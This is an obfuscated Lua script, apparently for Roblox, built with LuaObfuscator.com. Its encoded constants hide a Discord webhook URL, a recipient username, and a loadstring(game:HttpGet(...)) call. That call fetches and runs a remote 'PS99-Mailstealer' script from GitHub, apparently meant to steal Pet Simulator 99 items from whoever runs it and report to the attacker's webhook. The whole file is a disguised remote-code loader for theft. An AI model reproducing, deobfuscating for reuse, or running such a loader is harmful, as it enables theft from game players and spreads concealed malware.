--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v131=v5(v89,v19);v19=nil;return v131;else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=0 -(1065 -(68 + 997)) ;local v91;while true do if (v90==(0 -(1270 -(226 + 1044)))) then v91=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-1) -(v32-(932 -(857 + 74)))) + ((2477 -1908) -(367 + 201)))) ;return v91-(v91%(928 -(214 + 713))) ;end end else local v92=0 + 0 ;local v93;while true do if (v92==(0 + (117 -(32 + 85)))) then v93=(879 -(282 + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v93 + v93))>=v93) and (1 + 0 + 0)) or (0 -0) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + ((1770 -812) -(892 + 65)) ;v34=1 -0 ;end if (v34==(2 -1)) then return v35;end end end local function v22() local v36=350 -((1039 -(802 + 150)) + 263) ;local v37;local v38;while true do if (v36==(181 -(67 + 113))) then return (v38 * (188 + 68)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;v36=3 -2 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(5 -3)) ;return (v42 * (12211951 + 4565265)) + (v41 * 65536) + (v40 * ((730 + 523) -(915 + 82))) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,(2326 -(116 + 1022)) -(1069 + 118) ,45 -25 ) * ((3 -(4 -3))^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,823 -(368 + 249 + 174) )==(3 -2)) and  -(3 -2)) or (19 -(10 + 8)) ;if (v47==(0 -0)) then if (v46==(442 -(416 + 26))) then return v48 * (0 -0) ;else local v120=0 + 0 ;while true do if (v120==(0 -0)) then v47=1 -0 ;v45=438 -(145 + 293) ;break;end end end elseif (v47==(2477 -(44 + 386))) then return ((v46==(1486 -((1857 -(814 + 45)) + 488))) and (v48 * (1/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(838 + 185) ) * (v45 + (v46/(2^(824 -(201 + 571))))) ;end local function v25(v49) local v50;if  not v49 then local v94=0;while true do if (v94==(0 -(885 -(261 + 624)))) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v68=1 + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102) local v95=(function() return 0 -0 ;end)();local v96=(function() return;end)();local v98=(function() return;end)();while true do if (v95==(1518 -(1191 + 327))) then local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125~=0) then else v126=(function() return 0;end)();while true do if (v126~=1) then else v95=(function() return  #"}";end)();break;end if (0~=v126) then else v96=(function() return v97();end)();v98=(function() return nil;end)();v126=(function() return 699 -(208 + 490) ;end)();end end break;end end end if (v95== #"~") then if (v96== #".") then v98=(function() return v97()~=(0 + 0) ;end)();elseif (v96==(1 + 1)) then v98=(function() return v99();end)();elseif (v96== #"asd") then v98=(function() return v100();end)();end v101[v102]=(function() return v98;end)();break;end end return v95,v96,v97,v98,v99,v100,v101,v102;end;end)();local v53=(function() return function(v103,v104,v105,v106,v107,v108,v109,v110,v111) local v112=(function() return 836 -(660 + 176) ;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v112==0) then local v128=(function() return 0;end)();while true do if (v128==0) then v103=(function() return 0;end)();v104=(function() return nil;end)();v128=(function() return 1;end)();end if (v128==1) then v112=(function() return 1 + 0 ;end)();break;end end end if (v112~=1) then else local v129=(function() return 202 -(14 + 188) ;end)();while true do if (v129==0) then while true do if (v103==(675 -(534 + 141))) then v104=(function() return v105();end)();if (v106(v104, #"!", #">")~=(0 + 0)) then else local v174=(function() return 0;end)();local v175=(function() return;end)();local v176=(function() return;end)();local v177=(function() return;end)();while true do if (v174~=2) then else if (v106(v176, #"\\", #"{")== #"]") then v177[2 + 0 ]=(function() return v109[v177[2]];end)();end if (v106(v176,2,2 + 0 )== #",") then v177[ #"xnx"]=(function() return v109[v177[ #"nil"]];end)();end v174=(function() return 6 -3 ;end)();end if (v174~=(1 -0)) then else local v183=(function() return 0 -0 ;end)();while true do if (1~=v183) then else v174=(function() return 2 + 0 ;end)();break;end if (v183~=0) then else v177=(function() return {v107(),v107(),nil,nil};end)();if (v175==(396 -(115 + 281))) then local v191=(function() return 0 -0 ;end)();while true do if (v191==(0 + 0)) then v177[ #"19("]=(function() return v107();end)();v177[ #"?id="]=(function() return v107();end)();break;end end elseif (v175== #">") then v177[ #"-19"]=(function() return v108();end)();elseif (v175==2) then v177[ #"19("]=(function() return v108() -((4 -2)^(58 -42)) ;end)();elseif (v175== #"19(") then local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196==(867 -(550 + 317))) then v197=(function() return 0;end)();while true do if (v197==(0 -0)) then v177[ #"-19"]=(function() return v108() -(2^(22 -6)) ;end)();v177[ #"?id="]=(function() return v107();end)();break;end end break;end end end v183=(function() return 1;end)();end end end if ((0 -0)~=v174) then else local v184=(function() return 0;end)();while true do if (v184==(285 -(134 + 151))) then v175=(function() return v106(v104,1667 -(970 + 695) , #"-19");end)();v176=(function() return v106(v104, #".dev",11 -5 );end)();v184=(function() return 1991 -(582 + 1408) ;end)();end if (v184~=(3 -2)) then else v174=(function() return 1;end)();break;end end end if (v174==3) then if (v106(v176, #"19(", #"xxx")~= #"!") then else v177[ #"0313"]=(function() return v109[v177[ #"0313"]];end)();end v110[v111]=(function() return v177;end)();break;end end end break;end end return v103,v104,v105,v106,v107,v108,v109,v110,v111;end end end end end;end)();local v54=(function() return function(v113,v114,v115) local v116=(function() return 0 -0 ;end)();while true do if (0==v116) then local v130=(function() return 0;end)();while true do if (v130==0) then local v132=(function() return 0 -0 ;end)();while true do if (v132==(1824 -(1195 + 629))) then v113[v114-#":" ]=(function() return v115();end)();return v113,v114,v115;end end end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"\\",v59 do FlatIdent_79536,Type,v21,Cons,v24,v25,v60,v70=(function() return v52(FlatIdent_79536,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"-19"]=(function() return v21();end)();for v71= #"]",v23() do FlatIdent_7126A,Descriptor,v21,v20,v22,v23,v60,v55,v71=(function() return v53(FlatIdent_7126A,Descriptor,v21,v20,v22,v23,v60,v55,v71);end)();end for v72= #"<",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 -0 ];local v66=v62[243 -((1444 -(1043 + 214)) + (168 -(4 + 110))) ];local v67=v62[783 -(162 + 618) ];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=1 + 0 ;local v78= -(1 + (584 -(57 + 527)));local v79={};local v80={...};local v81=v12("#",...) -((1428 -(41 + 1386)) -0) ;local v82={};local v83={};for v117=(1212 -(323 + 889)) + 0 ,v81 do if ((v117>=v75) or (3275==1804)) then v79[v117-v75 ]=v80[v117 + 1 ];else v83[v117]=v80[v117 + (1637 -(1373 + 263)) ];end end local v84=(v81-v75) + (1001 -((554 -(17 + 86)) + 549)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 ];if (v86<=9) then if (v86<=((13 -8) -1)) then if (v86<=(1 -0)) then if ((1738<=2195) and (v86>(1384 -((1326 -(361 + 219)) + (958 -(53 + 267)))))) then v64[v85[3 + 0 ]]=v83[v85[2]];else v77=v85[(3 -1) + 1 ];end elseif (v86<=(2 -0)) then if (v83[v85[343 -(218 + 123) ]]==v85[1585 -(1535 + (133 -87)) ]) then v77=v77 + 1 + 0 ;else v77=v85[169 -(122 + 44) ];end elseif ((v86==(1 + 2)) or (1417>3629)) then local v158=v85[(975 -(15 + 398)) -(306 + 254) ];local v159=v83[v85[(983 -(18 + 964)) + (2 -0) ]];v83[v158 + (1 -0) ]=v159;v83[v158]=v159[v85[1471 -((3383 -2484) + 568) ]];else v83[v85[2 + 0 ]]();end elseif ((4795>402) and (v86<=(14 -8))) then if ((41<=3018) and (4813>3565) and (v86>5)) then local v136=v85[605 -(268 + (1111 -776)) ];local v137=v83[v85[3]];v83[v136 + 1 ]=v137;v83[v136]=v137[v85[4 + 0 ]];else do return;end end elseif ((2145<=4104) and (v86<=(297 -(60 + 134 + 96)))) then v83[v85[2]]=v64[v85[575 -(426 + 146) ]];elseif (v86==8) then local v163=v85[1 + 1 + 0 ];local v164,v165=v76(v83[v163](v13(v83,v163 + (1457 -(282 + 1174)) ,v85[814 -(569 + 242) ])));v78=(v165 + v163) -(2 -1) ;local v166=0 + 0 ;for v178=v163,v78 do local v179=0;while true do if ((2689<4845) and (3912==3912) and (v179==(1024 -(445 + 261 + 318)))) then v166=v166 + (1252 -(721 + 530)) ;v83[v178]=v164[v166];break;end end end else v77=v85[3];end elseif ((v86<=(1285 -(945 + 326))) or (2322>2622)) then if (v86<=(27 -(866 -(20 + 830)))) then if ((v86>(9 + 1)) or (4534==2082)) then do return;end else v83[v85[702 -(271 + 429) ]]=v85[(5 -2) + 0 + 0 ];end elseif (v86<=12) then local v145=v85[(1628 -(116 + 10)) -(1408 + 92) ];local v146,v147=v76(v83[v145](v13(v83,v145 + 1 ,v85[3])));v78=(v147 + v145) -(1087 -(461 + 625)) ;local v148=(96 + 1192) -(993 + 295) ;for v154=v145,v78 do v148=v148 + (66 -(30 + 35)) + (738 -(542 + 196)) ;v83[v154]=v146[v148];end elseif ((v86>13) or (1571>1867)) then v83[v85[1173 -(418 + 753) ]]=v85[2 + 1 ];else local v170=0 + 0 ;local v171;while true do if ((2821<=4824) and (v170==(0 + 0))) then v171=v85[1 + 1 ];v83[v171]=v83[v171](v13(v83,v171 + (530 -(406 + 123)) ,v78));break;end end end elseif (v86<=((3826 -2041) -(1749 + 20))) then if ((v86==(4 + 11)) or (2654>=2996)) then v83[v85[2]]();else v83[v85[1324 -(1249 + 73) ]]=v64[v85[2 + 1 + 0 ]];end elseif (v86<=17) then local v151=v85[1147 -(466 + 679) ];v83[v151]=v83[v151](v13(v83,v151 + ((2 + 0) -1) ,v78));elseif (v86==18) then if ((3978>2104) and (v83[v85[5 -3 ]]==v85[1904 -(106 + 1794) ])) then v77=v77 + 1 + 0 ;else v77=v85[3];end else v64[v85[1 + 2 ]]=v83[v85[(2 + 3) -3 ]];end v77=v77 + (2 -(1 + 0)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135363332333036303538302O38343533312F62494D614658544C616C3271705256555F64422O456835324D69484C4630757864734F7A5830742D34366D364A3470626668524754464E436F74476F6870307257414D7A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657203083O00557365726E616D65030D3O006D6F68616D656474616861656803093O00557365726E616D653200163O00120A3O00013O0026023O000D0001000200044O000D000100120A000100043O001213000100033O001207000100053O001207000200063O00200600020002000700120A000400084O0008000200044O000D00013O00022O000F00010001000100044O001500010026023O00010001000100044O0001000100120A0001000A3O001213000100093O00120A0001000A3O0012130001000B3O00120A3O00023O00044O000100012O00053O00017O00",v9(),...);
